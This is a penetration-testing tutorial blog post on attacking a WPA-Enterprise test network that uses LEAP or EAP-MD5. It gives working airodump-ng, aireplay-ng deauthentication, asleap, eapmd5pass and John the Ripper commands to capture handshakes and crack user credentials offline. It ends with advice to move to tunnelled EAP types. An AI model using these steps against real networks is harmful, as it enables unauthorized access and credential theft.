Monday, February 17, 2014

Wireless Pentesting on the Cheap (Kali + TL-WN722N) - WPA-Enterprise - Part I

By Tony Lee


In our previous articles we used TP-Link’s TL-WN722N and a Kali Virtual Machine (VM) to perform wireless discovery and attack against a Wired Equivalent Privacy (WEP) network, WPA (Pre-Shared Key) PSK network, a network hiding its SSID, and a MAC filtering network to showcase the abilities of this inexpensive and flexible setup.
In this article we will round out our tests by attacking a test WPA-Enterprise network that uses LEAP or EAP-MD5.  Our next article (Part II) will cover WPA-Enterprise PEAP and EAP-TLS.

Figure 1:  Our setup
Consult our previous WEP article for the following topics as they are omitted from this article due to similarity:
  • Equipment
    • Hardware
    • Software
  • Tips and tricks
    • Version of Workstation
    • Screen Resolution
    • Simple Text Editor
  • Connecting the USB Device


  • Preparation
  • WPA-Enterprise Refresher
  • Discovery
  • Attack
    • LEAP and EAP-MD5 Explained
    • Setting the Variables
    • Capture the Handshake
    • Deauthenticate the Client
    • Brute-force the Credentials
      • MSCHAPv2
      • EAPMD5
  • Countermeasures
  • Conclusion


NetworkManager (included in the default Kali Linux) can cause problems when trying to complete simple tasks such as connecting to wireless networks.  To prevent any interference, we will disable it ahead of time.

root@kali:~# service network-manager stop
[ ok ] Stopping network connection manager: NetworkManager.

WPA-Enterprise Refresher

We already looked at breaking WEP and WPA-PSK networks in previous articles and mentioned that the danger in using these wireless standards is that there is a shared static key that should be changed every time someone with knowledge of the key leaves the company.  After all, you wouldn’t want an ex-employee still being able to connect to the network after their departure--would you?  This is a security issue in any company that has regular turn over.  So what is the alternative?  WPA-Enterprise of course!
WPA-Enterprise is ideal for large organizations because it does not use a single shared key in which all users use to connect to the wireless network.  Each user has their own account (usually username and password) that they use to authenticate to the network.  Best of all these accounts can be centrally authenticated and managed--even linked into existing account repositories such as Active Directory or LDAP.  When an employee leaves the company and their account is terminated in Active Directory, it would also be terminated from the wireless if authentication is passed through.
The other unique WPA-Enterprise attribute is its use of Extensible Authentication Protocols (EAPs).  This allows multiple implementations and increased flexibility for corporations.  This flexibility is a double edge sword though as not all EAP types are created equal (in terms of security or ease of deployment).  The EAP types we will discuss in this article are bolded below (feel free to skip non-bolded as they are present to be complete):
  • LEAP - Lightweight EAP
    • Credentials are sent without SSL tunnel protection, using the MS-CHAP authentication protocol.
    • “[P]roprietary wireless LAN authentication method developed by Cisco Systems”
    • “LEAP uses a modified version of MS-CHAP, an authentication protocol in which user credentials are not strongly protected.”
    • “Cisco LEAP, similar to WEP, has had well-known security weaknesses since 2003 involving offline password cracking.”
  • EAP-MD5
  • PEAP - (Protected EAP)
    • “[E]ncapsulates the Extensible Authentication Protocol (EAP) within an encrypted and authenticated Transport Layer Security (TLS) tunnel”
    • “Jointly developed by Cisco Systems, Microsoft, and RSA Security.”
    • “Requiring only a server-side PKI certificate to create a secure TLS tunnel to protect user authentication, and uses server-side public key certificates to authenticate the server”
    • Most common inner authentication protocols are MSCHAPv2 and GTC (tokens)
  • EAP-TLS - (EAP-Transport Layer Security)
    • “[U]ses PKI to secure communication to a RADIUS authentication server or another type of authentication server.”
    • “Though it is rarely deployed, EAP-TLS is still considered one of the most secure EAP standards available and is universally supported by all manufacturers of wireless LAN hardware and software.”
    • Requires client-side certificate, which prevents many organizations from using it.
  • EAP-FAST - (Flexible Authentication via Secure Tunneling)
    • “[A] protocol proposal by Cisco Systems as a replacement for LEAP.”
    • “Use of server certificates is optional in EAP-FAST.”
    • “EAP-FAST uses a Protected Access Credential (PAC) to establish a TLS tunnel in which client credentials are verified.”
    • “When automatic PAC provisioning is enabled, EAP-FAST has a slight vulnerability where an attacker can intercept the PAC and use that to compromise user credentials.”

Discovery (kismet)

In previous articles, we used iwlist, airodump-ng, and Kismet to discover wireless networks.  This is also the case here.  Take a look below at the information that iwlist provides.

root@kali:~# iwlist wlan1 scanning | grep -A 30 CorpNetwork
                   Bit Rates:1 Mb/s; 2 Mb/s; 5.5 Mb/s; 11 Mb/s
                   Extra: Last beacon: 96ms ago
                   IE: Unknown: 000B436F72704E6574776F726B
                   IE: Unknown: 010482840B16
                   IE: Unknown: 030101
                   IE: IEEE 802.11i/WPA2 Version 1
                       Group Cipher : TKIP
                       Pairwise Ciphers (2) : CCMP TKIP
                       Authentication Suites (1) : 802.1x

Even though these three tools can identify WPA-Enterprise networks, none of them can tell you the EAP type.  For this we use Wireshark to inspect the packets.  Let’s capture some traffic with airodump-ng and inspect it with Wireshark, but first we want to place the wireless card into “Monitor” mode.

root@kali:~# airmon-ng start wlan0

We first use airodump-ng without any options in order to discover the network we want to examine and its details.  After we are obtain this information, we focus our collection efforts by locking onto the channel and AP.

airodump-ng -c <CHANNEL> --bssid  <APMAC> -w <FILE PREFIX> <INT>

-c = Channel that the AP is on
--bssid = MAC address of the AP
-w = Prefix of the file name that you want to write data to
<INT> = Interface we will be capturing on

airodump-ng --bssid A0:F3:C1:0C:B6:46 -c 1 -w mysteryEAP mon0

Figure 2:  airodump-ng is detecting wireless networks
From this screenshot, we will note a few items for the attack later:

Variable name = Description:  Value
$ESSID = ESSID:  CorpNetwork
$CH = Channel:  1
$AP = AP MAC: A0:F3:C1:0C:B6:46
$VM = Victim user MAC:  24:77:03:8C:D3:44

Now that our capture is running, we can inspect the packets with Wireshark.  In order to discover the EAP type, we can use Wireshark’s “Statistics -> Protocol Hierarchy” feature.  Look for 802.1X Authentication and apply a filter to those selected packets.  A shortcut would be to type “eapol” in the display filters.
Figure 3:  Wireshark Protocol Hierarchy feature
After applying the filters, we see that the EAP type is Cisco’s Lightweight EAP (LEAP).
Figure 4:  EAP type is LEAP


Now that discovery is complete and we understand the EAP type, we will examine the attack methodology for LEAP and EAP-MD5.  The outline below can be used for these two similar attack scenarios:
  • LEAP - Lightweight EAP
    • Capture 4-way handshake
    • Crack MSChapv2 with ASLEAP and Dictionary
  • EAP-MD5
    • Capture 4-way handshake
    • Crack EAP-MD5 with eapmd5 and Dictionary

LEAP & EAP-MD5 Explained

Since LEAP and EAP-MD5 do not use a secure tunnel to pass the authentication protocol, we just need to sniff the traffic and crack the password using a brute force attack.  Similar to the WPA-PSK attack, all of the information needed to crack the credentials is contained within the 4-way handshake, thus the attack will be very similar.
  • Set the variables
  • Start the capture
  • Deauthenticate the client
  • Crack the credentials

Setting the Variables

In our example, the victim information is summarized below:

Variable name = Description:  Value
$ESSID = ESSID:  CorpNetwork
$CH = Channel:  1
$AP = AP MAC: A0:F3:C1:0C:B6:46
$VM = Victim user MAC:  24:77:03:8C:D3:44

Since this is a good amount of information that can be easily mistyped (one number off on a MAC address), we use shell variables when attacking wireless networks.  Additionally, it is a bit of a pain to type the same values into multiple different windows.
It is good practice to open 2-3 windows and copy the following into each window to set the variables:

export ESSID= CorpNetwork
export CH=1
export AP= A0:F3:C1:0C:B6:46
export VM=24:77:03:8C:D3:44

Now that we have our windows set up and environment variables set to our victim, let’s begin the attack.  If you want to change your MAC address for extra stealth, now is the time to do so.

Capture the Handshake

We begin by capturing the traffic in an attempt to capture the 4-way handshake.  This is a convenient way to start because it also locks us on to the channel of the AP of interest (in this example, channel 6).

airodump-ng -c <CHANNEL> --bssid  <APMAC> -w <FILE PREFIX> <INT>

-c = Channel that the AP is on
--bssid = MAC address of the AP
-w = Prefix of the file name that you want to write data to
<INT> = Interface we will be capturing on

airodump-ng -c $CH --bssid  $AP -w WPA-LEAPcapture mon0

Deauthenticate the Client

The goal here is to deauthenticate (aka kick a client off the network) so they reconnect to the network.  Upon client reauthentication, we can capture their 4-way handshake.

aireplay-ng -0 25 -a <AP> -c < VICTIM_MAC> <INT>

-0 = (same as --deauth) deauthentication attack
-a = MAC address of the AP
-c = Victim MAC address
<INT> = Interface we will be attacking from

aireplay-ng -0 25 -a $AP -c $VM mon0

When you are watching your attack take place, keep an eye on the top right-hand corner of the capture window.  The following message should appear when you have successfully captured the 4-way handshake:  “WPA handshake:  XX:XX:XX:XX:XX:XX” (where X’s are the MAC address (BSSID) of the AP you are interested in).  Feel free to stop the capture process with Control+c after the handshake is captured.

Brute-force the Credentials

Since the attack on these WPA-Enterprise inner authentication protocols is an off-line brute-force attack, you will first need a sufficiently large wordlist to supply to the cracking program.  The word list is a good start as it is almost 14.5 million passwords.  In order to use the wordlist, you will have to uncompress it as shown below:

root@kali:/usr/share/wordlists# ls

root@kali:/usr/share/wordlists# gunzip rockyou.txt.gz

root@kali:/usr/share/wordlists# ls

root@kali:/usr/share/wordlists# wc -l rockyou.txt
14344392 rockyou.txt


After uncompressing the wordlist, run asleap as shown below:

root@kali:~# asleap
asleap 2.2 - actively recover LEAP/PPTP passwords. <>
asleap: Must supply an interface with -i, or a stored file with -r
Usage: asleap [options]

-r Read from a libpcap file
-i Interface to capture on
-f Dictionary file with NT hashes
-n Index file for NT hashes
-s Skip the check to make sure authentication was successful
-h Output this help information and exit
-v Print verbose information (more -v for more verbosity)
-V Print program version and exit
-C Challenge value in colon-delimited bytes
-R Response value in colon-delimited bytes
-W ASCII dictionary file (special purpose)

root@kali:~# asleap -W /usr/share/wordlists/rockyou.txt -r WPA-LEAPcapture-01.cap

For more complex cracking attempts, it is possible to use John the Ripper (JTR) to perform permutations and make dictionaries larger:

Generate permutations with JTR:
/usr/sbin/john --rules -w=/usr/share/wordlists/rockyou.txt --stdout

Feed JTR permutations into asleap:
/usr/sbin/john --rules -w=/usr/share/wordlists/rockyou.txt --stdout | asleap -W - -r <PCAP>

/usr/sbin/john --rules -w=/usr/share/wordlists/rockyou.txt --stdout | asleap -W - -r WPA-LEAPcapture-01.cap


In this case, LEAP was used--however if EAP-MD5 is used, the attack is very similar using the eapmd5pass tool:

root@kali:~# eapmd5pass
eapmd5pass - Dictionary attack against EAP-MD5

Usage: eapmd5pass [ -i <int> | -r <pcapfile> ] [ -w wordfile ] [options]

 -i <iface> interface name
 -r <pcapfile> read from a named libpcap file
 -w <wordfile> use wordfile for possible passwords.
 -b <bssid> BSSID of target network (default: all)
 -U <username> Username of EAP-MD5 user.
 -C <chal> EAP-MD5 challenge value.
 -R <response> EAP-MD5 response value.
 -E <eapid> EAP-MD5 response EAP ID value.
 -v increase verbosity level (max 3)
 -V version information
 -h usage information

The "-r" and "[-U|-C|-R|-E]" options are not meant to be used together.  Use -r when a packet capture is available.  Specify the username, challenge and response when available through other means.

root@kali:~# eapmd5pass -w /usr/share/wordlists/rockyou.txt -r WPAcapture-01.cap

For more complex cracking attempts, it is possible to use John the Ripper (JTR) to perform permutations and make dictionaries larger:

Generate permutations with JTR:
/usr/sbin/john --rules -w=/usr/share/wordlists/rockyou.txt --stdout

Feed JTR permutations into eapmd5pass:
/usr/sbin/john --rules -w=/usr/share/wordlists/rockyou.txt --stdout | eapmd5pass -w - -r <PCAP>

/usr/sbin/john --rules -w=/usr/share/wordlists/rockyou.txt --stdout | eapmd5pass -w - -r WPAcapture-01.cap


Even though the intention of this article is not to warn about the dangers of using WPA-Enterprise LEAP or EAP-MD5 security, we feel that it is important to note that neither should be used for a secure wireless implementation.  That said, we perform many wireless assessments in which we discover that some clients are using these EAP types.  When this is the case, we recommend that clients switch to a more secure EAP type that uses an encrypted tunnel such as PEAP, EAP-TLS, etc. with the caution that they securely configure the wireless clients (more about this in the next article).
In this article, we proved the capabilities of an inexpensive wireless adapter and a flexible virtualized wireless attack image by breaking into a WPA-Enterprise LEAP and EAP-MD5 test network.  For just $16 and no reboot required you can place a wireless adapter into monitor mode and start assessing wireless networks.  More testing needs to be done with this setup to determine other capabilities; however as of right now, it appears that it can provide quick, portable, flexible, and inexpensive wireless testing.  Feedback below is always appreciated.
If you try this with different cards and run into issues, check the following excellent resource:

Special Thanks

Dan Dumond

Rudolph Araujo